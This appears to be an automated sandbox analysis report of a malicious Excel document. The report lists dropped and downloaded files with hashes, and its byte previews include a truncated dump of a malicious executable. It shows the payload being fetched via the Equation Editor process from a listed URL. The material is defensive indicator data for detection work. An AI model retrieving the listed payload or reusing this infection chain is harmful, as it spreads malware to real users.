Preview:	p...... ................(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\IMG-354635[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	17672
Entropy (8bit):	6.083452939720215
Encrypted:	false
SSDEEP:	192:UmUm+uXCZS9d36cWvZo048xgVL4f6+aJS7wMU4sJlpeLEPGHAOH68QdEZWSA0pEL:f+uISL6cc48xULh+cS7sf0t6xaZ1+mhW
MD5:	5E56329C37A437E87B485914FD524AA9
SHA1:	4FA6777CB443C3065E6F5FDBA0B0F0820E166D49
SHA-256:	7B8ABFDD06C37CE096DE4B67C9839CB92F3DAB63BDA6CC1909597C24D1401C8C
SHA-512:	01CDEBEA72AE175143FDC1339B2AC2A8836D287C2C02C38FEEC6D60F4626642273DBD9A685EAB096CC0D2D7A92B9B24010D3722D86665192C6352BFFAE21D414
Malicious:	true
Reputation:	low
IE Cache URL:	https://carnesymas-restaurante.renova-sa.net/xwe123/IMG-354635.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yX............"...0..&...........E... ...`....@.. ....................................@..................................D..S....`..4............0............................................................... ............... ..H............text...$%... ...&.................. ..`.rsrc...4....`.......(..............@..@.reloc..............................@..B.................E......H.......4&...............................................................".(.....Vs!........s"........>..r...p.o%....".(&....Vs....('...t.........B.(?......(.........0..0........s.....+.../....r...po......(.....(......(......0............(.....+.+...0.....0...........r...p(.....+.+...2.....0..^........s......~....o......#...%..(.....o.......+%+...3...........(....(....o .......X....i2....+......0..!........s.....+...4....o......o#....+......0...........~.....+..*.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C91EEF3.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5630103A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B1E890E.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	653280
Entropy (8bit):	2.8986633406039006
Encrypted:	false
SSDEEP:	3072:s34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:e4UcLe0JOqQQZR8MDdATCR3tS+jqcC
MD5:	C0FA7A395230F3ADA5A6B9294AA566E7
SHA1:	2DF8010051004B9087F85C985EB313B93D124036
SHA-256:	14C02A5D52FC5A45123254A181B3FAC7624E896AB36D2A9C8629C9A36F4CEDA4
SHA-512:	98227100388ADD1449A796F034C1E7F582D6A84AD6772D9D65E526DBB32855F7493F0B020549F0AE3ED5D4018B366FAE058D2FEC020418F9AB23F7E9EC5F2B6E
Malicious:	false
Preview:	....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i...................................................../.../.....x./.../..N.Tx./.p./......./.\./..N.Tx./.p./. ....y.Qp./.x./. .......,....z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r.............../.X...p./.../..2.Q........../.../..{.Q....../.,...dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D92E84C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\987013DD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	111378
Entropy (8bit):	7.963743447431302
Encrypted:	false
SSDEEP:	3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
MD5:	5ACDB72AF63832D23CED937B6B976471
SHA1:	BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
SHA-256:	6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
SHA-512:	FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
Malicious:	false
Preview:	.PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..\|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...\|.n\|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD8689B7.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE58F458.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	111378
Entropy (8bit):	7.963743447431302
Encrypted:	false
SSDEEP:	3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
MD5:	5ACDB72AF63832D23CED937B6B976471
SHA1:	BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
SHA-256:	6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
SHA-512:	FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
Malicious:	false
Preview:	.PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..\|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...\|.n\|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .

C:\Users\user\AppData\Local\Temp\Cab117F.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 55578 bytes, 1 file
Category:	dropped
Size (bytes):	55578
Entropy (8bit):	7.995342925763736
Encrypted:	true
SSDEEP:	1536:BeQysAgNjwGLn31DsKaOvP3TQ5IhHnQl1GH:84jwGb1IKaOXjVFnQl1GH
MD5:	5C76CB48C81E1E013E0FD70132B0B861
SHA1:	14ADD82B9C667EAF75E1EB4D02E0AF7EDD166DD5
SHA-256:	68158977F401D13973F19AC7C2CF21F74FF60BF1405BF8627C88B51C9B8A6BE5
SHA-512:	EAA90CAD25827CC83852A756C1806BE2E5AA05DCADA28ED6B2ED3690DE42F5398B251537AA973DD28563F60828E8A0E114AEB81E09E1644D5D9F0511DF7E37BE
Malicious:	false
Preview:	MSCF............,...................I........D........WR.a .authroot.stl.{[.s.4..CK..8T....c_.d....A.K....=.D.eWI..RZ$Kr...H{I.R....H..k..;..f.[......y.y.}.y.....w.h:.7..+c.b'.1.tY.s7y.....C.Q.......D..`..%..[.....i,3.3..."js..$/...QRRVB..Jjv.3.....N...e$$.....6..p..#..{.y...^.4....B..\|+..<...A..t.<. ..V..`..O...CD../.s.\c.tc.....Keiv..A$.....8..(g..t.....,...s.d.].xqX4...&..u..l...No...+...5sa....!..[....M..1..r.. ?(.\[. H...#?.H.".. p.V.}.`L..ZP0.y....\|...A..%...&..3.a....c..7.T=.....hy~....w7bhq.z(\|.p.Z.......&0CO.eBS4......t.......h..e..L......c.qO.o.M.>,5.}..}.t\P9L}.O.i.a%.H.~...%..CEQ.V..p..Y.............q.c.0..V.T.>.Z..rT./K..d?V.TsYm..hn1?.4E..o~+......z....Hv..S...h,....yz.s.N.M1.W..<.....}.....B;[......>.}.#.YB..6m.....,.....7F$..~..W.:,S.5e.>..\|6!......G.3..`E..NF....u..7.n]}x..g...$..4.....V...g.3TO.dU;..9c....S\.<....q......Q.%.)A....':.`......m\|..3f.....;.t.Ish...wF....bQT........(...j..j0.=...s .Jxf....g...s..9.qe.x.:~...v.7

C:\Users\user\AppData\Local\Temp\Cab12D8.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 55578 bytes, 1 file
Category:	dropped
Size (bytes):	55578
Entropy (8bit):	7.995342925763736
Encrypted:	true
SSDEEP:	1536:BeQysAgNjwGLn31DsKaOvP3TQ5IhHnQl1GH:84jwGb1IKaOXjVFnQl1GH
MD5:	5C76CB48C81E1E013E0FD70132B0B861
SHA1:	14ADD82B9C667EAF75E1EB4D02E0AF7EDD166DD5
SHA-256:	68158977F401D13973F19AC7C2CF21F74FF60BF1405BF8627C88B51C9B8A6BE5
SHA-512:	EAA90CAD25827CC83852A756C1806BE2E5AA05DCADA28ED6B2ED3690DE42F5398B251537AA973DD28563F60828E8A0E114AEB81E09E1644D5D9F0511DF7E37BE
Malicious:	false
Preview:	MSCF............,...................I........D........WR.a .authroot.stl.{[.s.4..CK..8T....c_.d....A.K....=.D.eWI..RZ$Kr...H{I.R....H..k..;..f.[......y.y.}.y.....w.h:.7..+c.b'.1.tY.s7y.....C.Q.......D..`..%..[.....i,3.3..."js..$/...QRRVB..Jjv.3.....N...e$$.....6..p..#..{.y...^.4....B..\|+..<...A..t.<. ..V..`..O...CD../.s.\c.tc.....Keiv..A$.....8..(g..t.....,...s.d.].xqX4...&..u..l...No...+...5sa....!..[....M..1..r.. ?(.\[. H...#?.H.".. p.V.}.`L..ZP0.y....\|...A..%...&..3.a....c..7.T=.....hy~....w7bhq.z(\|.p.Z.......&0CO.eBS4......t.......h..e..L......c.qO.o.M.>,5.}..}.t\P9L}.O.i.a%.H.~...%..CEQ.V..p..Y.............q.c.0..V.T.>.Z..rT./K..d?V.TsYm..hn1?.4E..o~+......z....Hv..S...h,....yz.s.N.M1.W..<.....}.....B;[......>.}.#.YB..6m.....,.....7F$..~..W.:,S.5e.>..\|6!......G.3..`E..NF....u..7.n]}x..g...$..4.....V...g.3TO.dU;..9c....S\.<....q......Q.%.)A....':.`......m\|..3f.....;.t.Ish...wF....bQT........(...j..j0.=...s .Jxf....g...s..9.qe.x.:~...v.7

C:\Users\user\AppData\Local\Temp\CabB838.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar1180.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	148724
Entropy (8bit):	6.259574869876517
Encrypted:	false
SSDEEP:	1536:lIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlML:lNqccCymfdmoku2DMykMnNGL
MD5:	BE138194B79000B058F924D50A8EE37A
SHA1:	17302146674847DC121D51F7AD91C1E5369DCDE2
SHA-256:	EB8E3FAC4990BC1364A0A39623562A5F2048752EEDAE1B90425BCB2FA53D7538
SHA-512:	5ECCC6EE8BEB426880C15AEC4D8F1ED9BDDBD86964DA52D62FCAFD489E367F43E7667A2776238C673035F740E03311E5E2F7B474129F0F962EAFB6BE1C68A62B
Malicious:	false
Preview:	0..D....H.........D.0..D....1.0..D...+.....7.....D.0..D.0...+.....7......... X.....210223201327Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o.r.i.t.y...0...

C:\Users\user\AppData\Local\Temp\Tar12D9.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	148724
Entropy (8bit):	6.259574869876517
Encrypted:	false
SSDEEP:	1536:lIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlML:lNqccCymfdmoku2DMykMnNGL
MD5:	BE138194B79000B058F924D50A8EE37A
SHA1:	17302146674847DC121D51F7AD91C1E5369DCDE2
SHA-256:	EB8E3FAC4990BC1364A0A39623562A5F2048752EEDAE1B90425BCB2FA53D7538
SHA-512:	5ECCC6EE8BEB426880C15AEC4D8F1ED9BDDBD86964DA52D62FCAFD489E367F43E7667A2776238C673035F740E03311E5E2F7B474129F0F962EAFB6BE1C68A62B
Malicious:	false
Preview:	0..D....H.........D.0..D....1.0..D...+.....7.....D.0..D.0...+.....7......... X.....210223201327Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o.r.i.t.y...0...

C:\Users\user\AppData\Local\Temp\TarB839.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\oiKzrMXmBsLAwr\vbc.exe_Url_gcoeff2vvr13zvpz1jn1dqjzmfp05hh4\8.164.891.624\gt024duq.newcfg Download File
Process:	C:\Users\Public\vbc.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	861118
Entropy (8bit):	3.1020673073519367
Encrypted:	false
SSDEEP:	12288:pdywNLHJzzGrl9xWAg0tv8qp0kqlObJCwQqCTqpqesOJYbBocXRDoe:pJFuUUEq0/
MD5:	71F85088203D0E8D7640974B10C869EE
SHA1:	EF2E8B79BE526EDEAB78873B5325E06641E94F1A
SHA-256:	37BDB4EE3ADFD591D3BC62682AD0EF16AC7E822E99C9D662F2E23BA072B7F949
SHA-512:	FD78DA106E367BDAA187916F008A1F25F346F10AF143D41607979DBD53B664F99959E3E2080BDF93D775AF2FF8022EE7C7B60B6DC7D7701704B344B23E47F0E8
Malicious:	false
